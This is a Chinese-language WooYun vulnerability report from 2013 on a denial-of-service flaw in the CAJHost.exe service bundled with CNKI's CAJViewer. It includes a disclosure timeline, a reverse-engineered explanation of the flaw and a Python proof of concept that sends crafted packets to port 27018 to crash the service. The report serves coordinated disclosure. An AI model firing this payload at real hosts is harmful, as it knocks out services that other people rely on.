漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-036754
漏洞标题:中国知网CAJViewer阅读器拒绝服务漏洞
相关厂商:中国知网
漏洞作者: cssembly
提交时间:2013-09-11 11:00
修复时间:2013-12-10 11:01
公开时间:2013-12-10 11:01
漏洞类型:拒绝服务
危害等级:中
自评Rank:6
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-09-11: 细节已通知厂商并且等待厂商处理中
2013-09-15: 厂商已经确认,细节仅向厂商公开
2013-09-18: 细节向第三方安全合作伙伴开放
2013-11-09: 细节向核心白帽子及相关领域专家公开
2013-11-19: 细节向普通白帽子公开
2013-11-29: 细节向实习白帽子公开
2013-12-10: 细节向公众公开
简要描述:
CAJHost.exe是CAJViewer安装的一个服务程序,该程序存在拒绝服务漏洞
详细说明:
漏洞位置在sub_401790函数
程序首先通过v4 = recv(s, buf, 0x28u, 0);接受0x28字节,然后判断前四个字节是否大于0x100000且不为负,当接收到数据的前四个字节为0xFFFFFFFF时,程序跳转至Lable_16
v19为接受到数据的第二个dword,当v19为3时,由于v2此时并未分配空间,导致访问出错,拒绝服务。
同理,当v19为6时,执行sub_4021B0函数,此时v2并未分配空间,如果此时C:\Documents and Settings\All Users\Documents\TTKN\drm\p12目录下存在文件,则调用strcmp函数发生访问异常,拒绝服务。
漏洞证明:
poc代码如下:
import socket
HOST = '127.0.0.1'
PORT = 27018
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
# first
#exploit = "\xff\xff\xff\xff" + '\x03\x00\x00\x00' + 'A' * (0x28 - 5)
#s.send( exploit )
# second
exploit = "\xff\xff\xff\xff" + '\x06\x00\x00\x00' + 'A' * (0x28 - 5)
s.send( exploit )
s.close()
证明:
程序正常运行,运行第一段poc后,程序崩溃
同理运行第二段poc
修复方案:
版权声明:转载请注明来源 cssembly@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:13
确认时间:2013-09-15 23:29
厂商回复:
最新状态:
暂无